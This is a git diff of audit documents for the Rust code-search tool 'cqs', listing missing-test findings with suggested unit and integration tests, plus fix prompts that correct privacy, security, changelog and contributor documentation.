-- **Location:** `src/cli/watch.rs::spawn_hnsw_rebuild` (around line ~925, added in PR #1113), `drain_pending_rebuild` (same file). Plus the `PendingRebuild` struct fields `rx`, `delta`, `started_at` and the `RebuildOutcome` channel type (defined in WatchState section ~line 580-600).
-- **Description:** The flagship daemon fix in v1.30.0 — `cqs watch --serve` no longer blocks editor saves for 10-30s during full HNSW rebuilds — has **zero** automated test coverage. The change spawns a background thread that opens its own read-only `Store` on the slot's `index.db`, builds enriched + base HNSWs from scratch, sends the `Owned` index back through a channel, and the watch loop's `drain_pending_rebuild` replays any (chunk_id, embedding) deltas captured during the rebuild window into the new index before the swap (deduping against `new_index.ids()`). This is both correctness-critical (delta replay / dedup) and concurrency-critical (TOCTOU between rebuild snapshot and channel `recv`). A regression — e.g., delta vector dropped on swap, dedup miscompare leaking duplicates into HNSW, or rx-channel miss leaving the daemon stuck on the old index — would surface as silently-stale search results in the daemon, not as a test failure. The PR commit message explicitly calls out two failure modes (post-restart Loaded/Owned mismatch, every-100 threshold trigger) but no test was added for either.
-- **Suggested fix:** Add `tests/watch_hnsw_rebuild_test.rs` (or a `#[cfg(test)] mod` in `src/cli/watch.rs`) with three tests using `InProcessFixture`-style setup:
-  - `rebuild_completes_and_swaps_owned_index` — seed 50 chunks, call `spawn_hnsw_rebuild(...)`, wait on the channel, assert the returned `Owned` HNSW has `len() == 50` and contains all chunk ids.
-  - `delta_replayed_on_swap` — seed 50, spawn rebuild, while it's running call `WatchState::record_delta` with 5 new (id, embedding) pairs, then drain; assert the post-swap HNSW has `len() == 55` and the 5 deltas are searchable.
-  - `delta_dedup_avoids_double_insert` — seed 50, spawn rebuild, push a delta whose chunk_id already exists in the rebuild's snapshot; assert post-swap `len() == 50` (no duplicate insert) and the embedding matches the delta's value (winner is the most-recent write).
-  These can run with a tiny dim (e.g., 16) to keep the test fast — the rebuild path doesn't care about embedding semantics.
+- **Location:** src/cli/commands/infra/hook.rs:262-373
+- **Description:** Three of the four `HookCommand` variants — `Uninstall`, `Fire`, `Status` — ship with zero test coverage. `cmd_uninstall` has the foreign-hook-skip branch (line 283-285) that's the symmetric concern to `cmd_install`'s idempotence: a future refactor that drops the marker check would silently delete user-authored `post-checkout` hooks. `cmd_fire` is the runtime path — `daemon_reconcile` Ok → `sent_to_daemon = true` → return (line 312-316), and the fallback path (`.cqs/.dirty` touch, line 329-332). Both are unverified. `cmd_hook_status` has three text outputs (installed / foreign / missing) and a daemon-up probe, none pinned. The `daemon_reconcile` mock at `src/daemon_translate.rs:1104` exists — `cmd_fire` happy path is testable in-process today but has no test. Per the audit's "always do things properly" principle: a new command shipped without exercising at least one happy path per subcommand is not done.
+- **Suggested fix:** Add `cmd_uninstall_removes_only_marked_hooks` — seed two cqs-marked + one foreign hook in a tempdir, run uninstall, assert removed=2, skipped_foreign=1. Add `cmd_fire_writes_dirty_marker_when_daemon_absent` — point at a tempdir with no socket, run `cmd_fire("post-checkout", vec![], false)`, assert `.cqs/.dirty` exists and `report.sent_to_daemon == false`. Add `cmd_hook_status_classifies_three_hook_states` — fresh tempdir, write one cqs-marked + one foreign + leave one missing, run status, assert installed/foreign/missing each have one entry.
 
-#### TC-HAP-1.30-2: `for_each_command!` registry macro and the four `gen_*` emitters (#1114) ship with zero compile-fail or behavioral tests
+#### TC-HAP-1.30.1-3: `cmd_status` — entire CLI command body is untested; behaviour matrix promises 6 outcomes, zero are pinned
 - **Difficulty:** medium
-- **Location:** `src/cli/registry.rs:61` (`macro_rules! for_each_command!`), `src/cli/definitions.rs:850` (`gen_batch_support_impl`), `:897` (`gen_variant_name_impl`), `src/cli/dispatch.rs:51` (`gen_dispatch_group_a`), `:83` (`gen_dispatch_group_b`). Test counts: `registry.rs` = 0, `dispatch.rs` = 0, `definitions.rs` = 20 (but those test other things — clap arg parsing, `BatchSupport`, etc.).
-- **Description:** v1.30.0 collapsed five exhaustive matches over `Commands` (~675 LOC of dispatch matches) into a single `for_each_command!` table consumed by four macro emitters. The PR comment notes "Adding a variant without a registry row is a compile error in four places" — but **no test verifies this contract**. The macros also encode group-A vs group-B classification (no-store/lifecycle/mutation vs store-using) which controls whether a command runs before or after `CommandContext::open_readonly`. A registry-row classification mistake (e.g., new mutation command added to `group_b:` instead of `group_a:`) would compile fine but silently open a read-only store before the mutation — a subtle correctness bug. Beyond classification, there is no test that walks every `Commands` variant and asserts `BatchSupport::for_command(v)` and `variant_name(v)` return non-default values, which is the only guard against a future edit silently regressing the macro emitter to a default-arm fallback.
-- **Suggested fix:** Add `src/cli/registry.rs::tests` with two tests:
-  - `every_command_variant_has_batch_support_entry` — iterate the `Commands` discriminants (use `strum::EnumIter` or a hand-rolled list), call `BatchSupport::for_command(&v)` for each; assert no variant returns the macro's default `_ => BatchSupport::None` arm by checking against an explicit allowlist of "should be None" variants. Same for `variant_name`.
-  - `group_a_variants_disjoint_from_group_b` — derive the two sets from the registry rows (or from a debug introspection helper) and assert their intersection is empty. The `unreachable!("Group A variant `{name}` handled …")` arms in `dispatch.rs` enforce this at runtime; a test enforces it at compile-time-of-tests.
-  Plus a `compile_fail` doc-test that adds a variant without a registry row, expecting a compile error (use `trybuild` if already in dev-deps, otherwise skip).
+- **Location:** src/cli/commands/infra/status.rs:38-103 (production); 147-174 (tests)
+- **Description:** The three tests in the `tests` mod (`fresh_snapshot_is_fresh`, `stale_snapshot_is_not_fresh`, `unknown_snapshot_is_not_fresh`) exercise `WatchSnapshot::is_fresh()` — a one-line accessor on the *type*, not on `cmd_status`. The CLI body (lines 38-103) ships zero tests. The docstring (lines 28-35) explicitly promises a six-row "behaviour matrix": `(no flag)` → exit 1 with a specific message, `--watch-fresh` → exit 0 with one-line text, `--wait` without `--watch-fresh` → exit 1, `--watch-fresh --wait --json` with budget expired → exit 1, etc. None of those exit codes or output shapes are pinned. The `--wait`-without-`--watch-fresh` early-error (which would now exit 0 if the dispatch order in registry.rs ever changed, since the flag-check happens first) is invisible to the test suite. `print_text` (the multi-line text output a user actually sees) and `emit_no_daemon` (the friendly "is the daemon up?" stderr message) are both unreached. A regression that swaps `state:` and `modified_files=` lines (an agent's grep filter: `^state: fresh`) goes undetected.
+- **Suggested fix:** Add a `tests/cli_status_test.rs` integration test (mirrors `tests/cli_ref_test.rs` shape — XDG-isolated, assert_cmd, `gated behind slow-tests`) covering: (a) `cqs status` (no flag) exits 1 with `"pass --watch-fresh"` on stderr, (b) `cqs status --wait` (no `--watch-fresh`) exits 1 with the same gate message, (c) `cqs status --watch-fresh` against a tempdir without a daemon exits 1 and prints `cqs:` + the no-daemon message on stderr. For the daemon-up paths use the same `UnixListener` mock pattern as `wait_for_fresh_returns_fresh_on_first_poll` (daemon_translate.rs:1210) — pin the one-line text format (`state: fresh`) and the JSON envelope shape.
 
-#### TC-HAP-1.30-3: `select_provider` / `detect_provider` (embedder ExecutionProvider feature split, #1120) untested
+#### TC-HAP-1.30.1-4: `require_fresh_gate` — the function itself is never called by any test; both env-disable and `--no-require-fresh` short-circuits unverified end-to-end
 - **Difficulty:** easy
-- **Location:** `src/embedder/provider.rs:171` (`select_provider`), `:188` (`detect_provider`), `:258` (`build_session_with_provider`). Test count in this file: **0**.
-- **Description:** v1.30.0 PR #1120 (#956 Phase A) renamed `gpu-index` → `cuda-index` and split execution-provider selection out of `embedder/mod.rs` into `embedder/provider.rs`. The new module has zero tests. `select_provider` caches the result of `detect_provider` in a `OnceCell<ExecutionProvider>`, and `detect_provider` walks a feature-flag-conditional priority list (TensorRT > CUDA > CoreML > ROCm > CPU). A regression in the cache-on-first-call invariant, in the priority ordering, or in the `cfg(feature = "cuda-index")` gating could ship without anyone noticing — the prod path runs a single time per process and a wrong provider just shows up as "embeddings ran on CPU when CUDA was supposed to be enabled". The `Display for ExecutionProvider` impl at `src/embedder/mod.rs:207` is also untested.
-- **Suggested fix:** Add `src/embedder/provider.rs::tests` with three tests (gated as needed by feature flags):
-  - `cpu_when_no_features` (no feature gates, always runs) — under a thread-local override path, force `detect_provider()` into the CPU branch and assert it returns `ExecutionProvider::CPU`.
-  - `cuda_selected_when_feature_enabled` (`#[cfg(feature = "cuda-index")]`) — assert that on a CUDA-enabled build, `detect_provider` returns `CUDA { device_id: 0 }` if the runtime env reports a GPU; pin via mock or by reading `select_provider()` once and checking the variant.
-  - `select_provider_caches_first_call` — call `select_provider()` twice, assert both return the same enum value (the `OnceCell` invariant); flip an env var between calls and assert it's still cached.
+- **Location:** src/cli/commands/eval/mod.rs:219-275 (production); 405-432 (test reimplements env logic inline)
+- **Description:** Sibling of TC-ADV-1.30.1-7 but on the *happy* axis. The two short-circuits at the top of `require_fresh_gate` — `if *no_require_fresh_flag { return Ok(()) }` (line 220-223) and `if env_disables_freshness_gate() { return Ok(()) }` (line 224-230) — are the entire bypass surface that makes `cqs eval` runnable in CI / dev shells without a daemon. Neither path is exercised by *calling* `require_fresh_gate`. The test at line 406 reimplements the env body inline (called out in TC-ADV-1.30.1-7); the `--no-require-fresh` path has no test at all. Every integration test in `tests/eval_subcommand_test.rs` and `tests/eval_baseline_test.rs` sets `CQS_EVAL_REQUIRE_FRESH=0` to bypass the gate (`tests/eval_subcommand_test.rs:91`) — so even the "eval works end-to-end" suite is silent on whether the gate is wired. A future change that swaps the order of the two short-circuits, or accidentally returns `Err` on `*no_require_fresh_flag = true` (a one-character typo `if !*no_require_fresh_flag`), passes every test.
+- **Suggested fix:** Make `require_fresh_gate` `pub(crate)` (already is) and add `require_fresh_gate_no_require_fresh_flag_returns_ok_without_daemon` — call directly with `&true, 5`, assert `Ok(())` returns immediately even though no socket exists. Add `require_fresh_gate_env_disable_returns_ok_without_daemon` (gated `#[serial_test::serial]` to share the env namespace with the existing tests in daemon_translate.rs) — set `CQS_EVAL_REQUIRE_FRESH=0`, call with `&false, 5`, assert `Ok(())`. Add `require_fresh_gate_fresh_daemon_returns_ok` — spin up the same `UnixListener` mock used by `wait_for_fresh_returns_fresh_on_first_poll`, point `CQS_HOME`/`XDG_RUNTIME_DIR` at the tempdir, call with `&false, 5`, assert `Ok(())`.
 
-#### TC-HAP-1.30-4: `build_hnsw_index_owned` and `build_hnsw_base_index` — core index helpers used by both `cqs index` and the new `spawn_hnsw_rebuild` — have zero direct tests
+#### TC-HAP-1.30.1-5: `wait_for_fresh` — Stale → Fresh transition (the realistic wait case) untested; only "fresh on first poll" pinned
 - **Difficulty:** medium
-- **Location:** `src/cli/commands/index/build.rs:848` (`build_hnsw_index_owned`), `:880` (`build_hnsw_base_index`). Test count for `index/build.rs`: **0**. Both fns are `pub(crate)` and called from at least 3 sites: `run_index_pipeline`, `spawn_hnsw_rebuild` (#1113), and the post-pipeline finalizer.
-- **Description:** These are the two functions every full-rebuild path goes through. `build_hnsw_index_owned` returns the enriched HNSW (used by the dual-index router); `build_hnsw_base_index` returns the base (non-enriched) HNSW (used as router fallback). The functions wrap embedding fetch + HNSW construction + on-disk save. Their callers (`cmd_index`, `spawn_hnsw_rebuild`) are integration-tested only end-to-end through `cqs index` invocations. No test asserts: (a) the returned `Owned` has the right `len()` matching chunk count, (b) the saved file at the right path can be loaded back, (c) `build_hnsw_base_index` returns `Ok(None)` when `embedding_base` rows are empty (its current shortcut), (d) the dim of the saved index matches `store.dim()`. With #1113 making these critical to the daemon-rebuild path, the absence of unit-level pins is a fresh risk.
-- **Suggested fix:** Add `src/cli/commands/index/build.rs::tests` with three tests using `InProcessFixture`:
-  - `build_hnsw_index_owned_returns_index_with_chunk_count` — seed 10 chunks with 16-dim embeddings, call `build_hnsw_index_owned(&store, &cqs_dir)`, assert `Some(idx)` returned and `idx.len() == 10`.
-  - `build_hnsw_base_index_returns_none_when_no_base_rows` — fresh store, call `build_hnsw_base_index`, assert `Ok(None)`.
-  - `build_hnsw_index_owned_round_trips_through_disk` — build, save, then `HnswIndex::load_with_dim(...)` from the saved path; assert the loaded index has the same `len()` and an arbitrary chunk-id is present in `ids()`.
+- **Location:** src/daemon_translate.rs:660-679 (production); 1208-1376 (tests)
+- **Description:** Of the three `FreshnessWait` outcomes, only the *trivial* Fresh path is pinned: `wait_for_fresh_returns_fresh_on_first_poll` (line 1210) accepts a single connection, returns Fresh immediately, the helper exits the loop on iteration zero. The *common* shape — daemon reports Stale on first poll, then Fresh on a subsequent poll within budget — is never tested. That is the literal use case the helper exists for: "wait up to N seconds for a reindex to drain". A regression that breaks the polling loop (e.g., a refactor that reads the snapshot but never re-checks `is_fresh()`, or sleeps inside the lock and starves the polling thread) returns Fresh on iteration zero (test pass) and never converges on iteration N (production hang). With a 250 ms hardcoded poll interval (SHL-V1.30-2) the test would still run in <1 s — `wait_secs=2`, accept three connections, return Stale-Stale-Fresh, assert the helper takes ≥250 ms and returns Fresh. No such test exists.
+- **Suggested fix:** Add `wait_for_fresh_returns_fresh_after_two_stale_polls` — `UnixListener` accepts 3 connections in order, writes Stale envelope twice then Fresh, the helper returns `FreshnessWait::Fresh(_)` after roughly one poll interval. Pin the elapsed `>= POLL_INTERVAL` lower bound. Optionally also pin `incremental_count` from the *third* response so the test fails if the helper accidentally returns the first response.
 
-#### TC-HAP-1.30-5: `hyde_query_pass` and `doc_comment_pass` (LLM passes shipping in `cqs index --hyde` / `--improve-docs`) have zero tests
+#### TC-HAP-1.30.1-6: `process_file_changes` — the central watch-loop reindex function has zero direct tests
+- **Difficulty:** hard
+- **Location:** src/cli/watch/events.rs:131-300+ (production)
+- **Description:** `process_file_changes` is the function the watch daemon calls every cycle to drain `pending_files` into the index — the entire post-event happy path. It has zero direct tests. `grep -rn process_file_changes src` returns three production call sites in `watch/mod.rs` (lines 1125, 1254, 1276) and zero test sites. The `reconcile.rs::tests::reconcile_detects_bulk_modify_burst` test exercises *queueing* into `pending_files`, then asserts the snapshot reads Stale — but never invokes `process_file_changes` to drain it. So the canonical "queue → drain → snapshot reads Fresh" round-trip is **not** an end-to-end test in the suite; both halves exist, only the seam is untested. The `try_init_embedder` Err arm (already flagged as EH-V1.30.1-8) silently returns without clearing dirty flags — invisible without a test that drives the full drain. The `dropped_this_cycle > 0` warn arm (line 139-145) is also unreached. The println! gating on `cfg.quiet` (line 147) is not pinned (related to OB-V1.30.1-9 which flagged the println! itself).
+- **Suggested fix:** Add a `process_file_changes_zero_files_is_noop` test — empty `pending_files`, run, assert `state.pending_files.is_empty()` and no panics, no embedder init. Add `process_file_changes_single_file_drains_into_index` — seed one Rust file in a tempdir, push its rel path into `pending_files`, run with a stub embedder (existing `placeholder_embedding` helper from reconcile tests), assert (a) `state.pending_files` is empty after, (b) `store.search` returns the new chunk. Add `process_file_changes_reports_dropped_warn_once_then_resets` — set `state.dropped_this_cycle = 5`, run, assert `state.dropped_this_cycle == 0` after (this pins the reset-after-warn semantic that's currently invisible).
+
+#### TC-HAP-1.30.1-7: Eval freshness gate — no integration test confirms `cqs eval` actually runs after a Fresh gate verdict
 - **Difficulty:** medium
-- **Location:** `src/llm/hyde.rs:11` (`hyde_query_pass`, full file 98 LOC, **zero** tests), `src/llm/doc_comments.rs:135` (`doc_comment_pass`). Compare with `src/llm/summary.rs::llm_summary_pass` which has 4+ end-to-end tests in `tests/local_provider_integration.rs:113-280`.
-- **Description:** Three LLM batch passes ship in production: `llm_summary_pass`, `doc_comment_pass`, and `hyde_query_pass`. Only `llm_summary_pass` has integration tests against the local mock server. Both `doc_comment_pass` and `hyde_query_pass` go through identical machinery — `collect_eligible_chunks` filter → `BatchPhase2::submit_or_resume` → store write — but their specific filter (e.g., `needs_doc_comment` for doc_comments, the HyDE eligibility predicate at `src/llm/hyde.rs`) and their result-purpose tags (`"hyde"` vs `"summary"` vs `"doc_comment"`) are unique. A regression in either one's filter or in the `set_pending_*_batch_id` resumption path (HyDE uses `s.get_pending_hyde_batch_id` / `s.set_pending_hyde_batch_id`) could ship — the existing `llm_summary_pass` tests don't cover them. Both passes are billed surfaces (real Anthropic dollars in the prod path); a regression that double-submits or fails resumption costs real money.
-- **Suggested fix:** Extend `tests/local_provider_integration.rs` with two parallel tests mirroring the existing `llm_summary_pass` tests:
-  - `hyde_query_pass_round_trips_through_mock_server` — seed 3 chunks, mock the local server's `/v1/chat/completions` to return canned predictions, run `hyde_query_pass`, assert `count == 3` and `store.get_summaries_by_purpose("hyde")` has 3 rows.
-  - `doc_comment_pass_skips_already_documented_functions` — seed 3 chunks where 1 has a doc comment per `needs_doc_comment`'s predicate, run `doc_comment_pass`, assert `count == 2` (the 1 already-documented chunk skipped). Verifies the unique-to-doc_comments filter.
+- **Location:** tests/eval_subcommand_test.rs:88-93 + tests/eval_baseline_test.rs:96
+- **Description:** Every integration test in the eval suite sets `CQS_EVAL_REQUIRE_FRESH=0` to bypass the gate (`eval_subcommand_test.rs:91`, `eval_baseline_test.rs:96`). There is no integration test that exercises the gate in its primary mode: spin up a daemon mock that returns Fresh, run `cqs eval` *without* the env bypass, confirm the gate passes and the runner proceeds to compute R@K. This is the entire "PR 4 of #1182" landed feature surface — it ships untested end-to-end. Worse, the wiring between `require_fresh_gate(Ok)` and the rest of `cmd_eval` is unverified: a future refactor that changes `require_fresh_gate` to return `Result<bool>` (e.g., to surface "gate disabled by env" in JSON output) and has the caller forget to re-check the bool would silently skip eval entirely on every Fresh verdict — and every test would still pass, because every test sets the bypass env.
+- **Suggested fix:** Add `tests/cli_eval_freshness_gate_test.rs::eval_runs_against_seeded_store_with_fresh_daemon` — same fixture shape as `test_eval_runs_against_seeded_store` (eval_subcommand_test.rs:100) but **without** the `CQS_EVAL_REQUIRE_FRESH=0` env, with an `XDG_RUNTIME_DIR` pointing at a tempdir hosting a `UnixListener` mock that responds to one `status` request with a Fresh envelope. Assert (a) the eval command exits 0 within 10 s, (b) the `[eval] checking watch-mode freshness` stderr line appears (heads-up message at line 242), (c) the report JSON contains a non-zero `recall_at_5`. Gate behind `slow-tests` like the other CLI tests.
 
-## Summary
+#### TC-HAP-1.30.1-8: `WatchSnapshot::compute` — the `Rebuilding` state entry is untested even though the production state machine has it
+- **Difficulty:** easy
+- **Location:** src/watch_status.rs (production); src/cli/watch/reconcile.rs:303-388 (only Stale + Fresh tested via compute)
+- **Description:** `reconcile_detects_bulk_modify_burst` (reconcile.rs:303) calls `WatchSnapshot::compute` and asserts `state == Stale`. `reconcile_skips_unchanged_files` (line 396) covers the implicit Fresh case but doesn't call `compute` — it asserts on the queue, not on the snapshot. There is **no test** that drives `WatchSnapshot::compute` with `rebuild_in_flight: true` and asserts the resulting state is `Rebuilding`. The four-state enum (`Fresh / Stale / Rebuilding / Unknown` per watch_status.rs:63 region) has only two states pinned through the `compute` entrypoint. A regression that maps `rebuild_in_flight: true` → `Stale` (e.g., a refactor merging the two "not fresh" states into one) silently breaks `cqs status --watch-fresh --wait`'s exit-code distinction between "actively rebuilding, will finish soon" and "stale, no rebuild scheduled". Also untested: `delta_saturated: true` with `pending_files: 0` (TC-ADV-1.30.1-8 already flagged this — but on the adversarial axis; the *happy* axis of "saturated → Rebuilding because we know we missed events" is also unpinned).
+- **Suggested fix:** Add a unit test in `src/watch_status.rs` itself (no temp files needed): `compute_with_rebuild_in_flight_returns_rebuilding` — feed `WatchSnapshotInput { rebuild_in_flight: true, pending_files_count: 0, ... }`, assert `snap.state == FreshnessState::Rebuilding`. Add `compute_unknown_when_no_input_observed` if `unknown()` is reachable from `compute` (e.g., a `last_event` of `Instant::now() - 0` with no other signals). Pinning these three states in one place keeps the four-state enum's full transition table inside the test suite.
 
-15 findings filed (10 from initial v1.29 audit + 5 v1.30.0-specific).
+#### TC-HAP-1.30.1-9: Eval text-report rendering (`print_text_report`) — only the `pct` helper is tested in isolation; the full report's row-by-row format is unpinned
+- **Difficulty:** easy
+- **Location:** src/cli/commands/eval/mod.rs:296+ (`print_text_report`)
+- **Description:** `print_text_report` is the canonical user-facing output of `cqs eval`. The `tests` mod tests `pct` formatting (line 349) and arg-parser flags (lines 360, 383, 405, 435) — none assert on the rendered report shape. The format docstring at line 294-295 explicitly says "Format mirrors the spec exactly so a user comparing old python output against `cqs eval` output can eyeball the same shape". That spec-compatibility guarantee is unenforced: any change to the header row (`=== eval results: <name> (N=<n>) ===`), to the metric ordering (R@K, MRR, etc.), or to the column count silently breaks downstream `grep | awk` consumers — and there is no test that fails. The eval baseline diff workflow (PR-N of #1182) ships an `eval --baseline` mode (line 406) that compares two report files; if `print_text_report` ever drops a column, every diff comparison silently degrades and no test catches it.
+- **Suggested fix:** Add `print_text_report_renders_canonical_header_and_metrics` — build a fixture `EvalReport` with deterministic numbers (recall_at_1=0.5, recall_at_5=1.0, mrr=0.75, N=2), capture stdout via the `gag` crate or a test-side `Write` impl, assert the output contains the literal lines `=== eval results: test (N=2) ===`, `R@1: 0.5`, `R@5: 1.0`, `MRR: 0.750` in that order. Pin the output as a multi-line string literal so any column reordering / float-format change produces a single clear diff.
 
-The most impactful gaps in the v1.30.0-specific batch:
-- **TC-HAP-1.30-1** — flagship #1113 fix (non-blocking HNSW rebuild) has **zero** tests despite shipping concurrency-critical delta/dedup logic in the daemon hot path
-- **TC-HAP-1.30-2** — #1114 single-registration command registry's classification correctness (group_a vs group_b) is enforced only at compile time of the dispatch matches, not at test time; a misclassified mutation command would silently open a read-only store
-- **TC-HAP-1.30-4** — `build_hnsw_index_owned` / `build_hnsw_base_index` are now critical to both `cqs index` and `spawn_hnsw_rebuild` and have no direct unit tests
-
-The original v1.29 findings remain valid; the most impactful is still #1 — the entire `cqs serve` subsystem has 14 tests but all run against an empty store. Several of these are cheap adds (~1 test each) because the in-process fixture already exists.
-
+#### TC-HAP-1.30.1-10: `daemon_translate::daemon_reconcile` — happy-path round-trip pinned, but the `args` payload (hook arguments forwarded from git) is never observed end-to-end
+- **Difficulty:** easy
+- **Location:** src/daemon_translate.rs:537-… (production); 1102+ (tests); src/cli/commands/infra/hook.rs:296-322 (the production caller)
+- **Description:** `daemon_reconcile_mock_round_trip` (line 1104) covers the happy `Ok` envelope, but the test passes empty `args` and an explicit `name`. The actual production caller in `cmd_fire` (hook.rs:311) forwards `args` verbatim from git — for `post-rewrite`, that's e.g. `["amend", "abc123"]`; for `post-checkout`, that's `[<old-sha>, <new-sha>, "1"]` (3-element vector with branch flag). No test pins the wire shape: does `daemon_reconcile` JSON-encode the `args` array correctly? Are non-ASCII bytes (Git can technically pass UTF-8 in commit messages used as ref names) preserved? A regression that drops or truncates `args` in the request payload is invisible — the daemon doesn't *use* `args` for the reconcile algorithm itself per hook.rs:80-82 ("Captured verbatim for tracing; not used for the reconcile algorithm itself"), so the daemon side never errors and the response envelope still says ok. The whole tracing audit trail (which hook fired, with which args) silently breaks.
+- **Suggested fix:** Add `daemon_reconcile_forwards_hook_args_verbatim` — extend the mock to *capture* the request line (don't just consume it), assert the parsed JSON contains `args: ["abc123", "def456", "1"]` exactly when the caller passes that vec. Optionally also add `daemon_reconcile_forwards_unicode_args` with `["mañana", "🚀"]` to pin UTF-8 round-trip — guards against a future serde-json switch to a binary-string encoding.

--- a/docs/audit-fix-prompts-v1.30.0.md
+++ b/docs/audit-fix-prompts-v1.30.0.md
@@ -1,1419 +1,3398 @@
-# Audit Fix Prompts — v1.29.0
+# v1.30.0 Audit — P1 Fix Prompts
 
-Source triage: `docs/audit-triage.md` (P1 + P2 only)
+21 fix prompts for the P1 (easy + high-impact) findings. Verified against current source 2026-04-26.
 
-Generated: 2026-04-23
+Notes on drift:
+- P1.16 — `--name-boost` CLI parser is already `parse_unit_f32` (clap-bounded). The audit text was stale; only the **defense-in-depth** clamp at the consumer remains.
+- All other P1 line citations verified to current source.
 
 ---
 
-## P1
+## P1.1 + P1.2 — PRIVACY/SECURITY lie about query_log opt-in and query_cache TTL
 
-### SEC-1: `cqs serve` accepts any `Host` header (DNS-rebinding)
+**Finding:** P1.1 + P1.2 in audit-triage.md / Documentation in audit-findings.md (DOC-V1.30-1, DOC-V1.30-2)
+**Files:** `PRIVACY.md:21-22`, `SECURITY.md:101`, `src/cli/batch/commands.rs:371-399`
+**Why:** PRIVACY claims query_log is opt-in but `log_query` is unconditional. PRIVACY claims 7-day TTL on query_cache; only size cap exists. Both are P1 "docs lying" — fix the docs (defensible direction; gating the log requires touching every dispatch arm and changing user-visible behaviour).
 
-**File**: `/mnt/c/Projects/cqs/src/serve/mod.rs`
+### Current docs (PRIVACY.md:21-22)
 
-**Current code** (lines 55-114, re-read at generation time — matches triage):
+```markdown
+- `~/.cache/cqs/query_cache.db` — recent query embeddings with a 7-day TTL. Speeds up repeated searches.
+- `~/.cache/cqs/query_log.jsonl` — opt-in query log, written only when `CQS_TELEMETRY=1` or the file already exists. Stays local.
+```
+
+### Replacement (PRIVACY.md:21-22)
+
+```markdown
+- `~/.cache/cqs/query_cache.db` — recent query embeddings, evicted oldest-first when the DB exceeds `CQS_QUERY_CACHE_MAX_SIZE` (100 MiB default). Prune older entries with `cqs cache prune <DAYS>`. Speeds up repeated searches.
+- `~/.cache/cqs/query_log.jsonl` — local query log written by every `cqs chat` / `cqs batch` invocation (search/gather/onboard/scout/where/task). Append-only JSONL. Delete the file to disable; `cqs cache clear` does not remove it. Stays local.
+```
+
+### Current docs (SECURITY.md:101)
+
+```markdown
+| `~/.cache/cqs/query_log.jsonl` | Opt-in local query log | `CQS_TELEMETRY=1` or file exists |
+```
+
+### Replacement (SECURITY.md:101)
+
+```markdown
+| `~/.cache/cqs/query_log.jsonl` | Local query log (append-only) | `cqs chat` / `cqs batch` (search, gather, onboard, scout, where, task) |
+```
+
+### Notes
+
+- The "fix the code" alternative (gate `log_query` on `CQS_TELEMETRY=1` plus existing-file check) is the *more defensible* contract but a behaviour change. Pick docs-fix here unless reviewer explicitly opts into a behaviour change. If the reviewer chooses code-fix, gate the body of `log_query` (`src/cli/batch/commands.rs:371`) on `std::env::var("CQS_TELEMETRY").as_deref() == Ok("1") || log_path.exists()` returning early otherwise.
+
+---
+
+## P1.3 — CHANGELOG names CQS_LLM_ENDPOINT — actual var is CQS_LLM_API_BASE
+
+**Finding:** P1.3 in audit-triage.md / Documentation DOC-V1.30-3
+**Files:** `CHANGELOG.md:19`
+**Why:** CHANGELOG v1.30.0 entry references `CQS_LLM_ENDPOINT`, which does not exist in the codebase. Actual env var is `CQS_LLM_API_BASE` (plus `CQS_LLM_PROVIDER=local`). User copy-pasting fails at runtime.
+
+### Current
+
+```markdown
+- **Local LLM provider (OpenAI-compatible)** — `cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_ENDPOINT`, in addition to the existing Anthropic Batches API path (#1101 — closes audit finding EX-V1.29-3). `LlmProvider` trait, `LocalProvider` implementation, end-to-end summary generation via local vLLM / Ollama / etc.
+```
+
+### Replacement
+
+```markdown
+- **Local LLM provider (OpenAI-compatible)** — `cqs index --llm-summaries` accepts a local OpenAI-compatible endpoint via `CQS_LLM_PROVIDER=local` + `CQS_LLM_API_BASE=<url>`, in addition to the existing Anthropic Batches API path (#1101 — closes audit finding EX-V1.29-3). `LlmProvider` trait, `LocalProvider` implementation, end-to-end summary generation via local vLLM / Ollama / etc.
+```
+
+---
+
+## P1.4 — CONTRIBUTING tells contributors to edit dispatch.rs (registry.rs now)
+
+**Finding:** P1.4 in audit-triage.md / Documentation DOC-V1.30-4
+**Files:** `CONTRIBUTING.md:339-355` (checklist), `CONTRIBUTING.md:153-158` (Architecture Overview)
+**Why:** v1.30.0 #1097/#1114 collapsed five exhaustive matches in `dispatch.rs`/`definitions.rs` into one `for_each_command!` table in `src/cli/registry.rs`. The contributor checklist still says "match arm in `src/cli/dispatch.rs`" with no mention of `registry.rs`.
+
+### Current (CONTRIBUTING.md:339-355)
+
+```markdown
+## Adding a New CLI Command
+
+Checklist for every new command:
+
+1. **Implementation** — `src/cli/commands/<category>/<name>.rs` with the core logic (pick category: search/, graph/, review/, index/, io/, infra/, train/)
+2. **Category mod.rs** — add `mod <name>;` + `pub(crate) use <name>::*;` in `src/cli/commands/<category>/mod.rs`
+3. **CLI definition** — `Commands` enum variant in `src/cli/definitions.rs` with clap args
+4. **Dispatch** — match arm in `src/cli/dispatch.rs`
+5. **`--json` support** — serde serialization for programmatic output
+6. **Tracing** — `tracing::info_span!` at entry, `tracing::warn!` on error fallback
+7. **Error handling** — `Result` propagation, no bare `.unwrap_or_default()` in production
+8. **Tests** — happy path + empty input + error path + edge cases
+9. **CLAUDE.md** — add to the command reference section
+10. **Skills** — add to `.claude/skills/cqs/SKILL.md` and `.claude/skills/cqs-bootstrap/SKILL.md`
+11. **CHANGELOG** — entry in the next release section
+```
+
+### Replacement (CONTRIBUTING.md:339-355)
+
+```markdown
+## Adding a New CLI Command
+
+Checklist for every new command:
+
+1. **Implementation** — `src/cli/commands/<category>/<name>.rs` with the core logic (pick category: search/, graph/, review/, index/, io/, infra/, train/)
+2. **Category mod.rs** — add `mod <name>;` + `pub(crate) use <name>::*;` in `src/cli/commands/<category>/mod.rs`
+3. **CLI definition** — `Commands` enum variant in `src/cli/definitions.rs` with clap args
+4. **Registry row** — add a `(bind, wild, name, batch_support, body)` row to `group_a` or `group_b` in `src/cli/registry.rs`. The `for_each_command!` macro generates dispatch + variant_name + batch_support from this single row; a missing row is a compile error.
+5. **`--json` support** — serde serialization for programmatic output
+6. **Tracing** — `tracing::info_span!` at entry, `tracing::warn!` on error fallback
+7. **Error handling** — `Result` propagation, no bare `.unwrap_or_default()` in production
+8. **Tests** — happy path + empty input + error path + edge cases
+9. **CLAUDE.md** — add to the command reference section
+10. **Skills** — add to `.claude/skills/cqs/SKILL.md` and `.claude/skills/cqs-bootstrap/SKILL.md`
+11. **CHANGELOG** — entry in the next release section
+```
+
+### Current (Architecture Overview, CONTRIBUTING.md:153-158)
+
+```markdown
+  cli/          - Command-line interface (clap)
+    mod.rs      - Top-level CLI module, re-exports
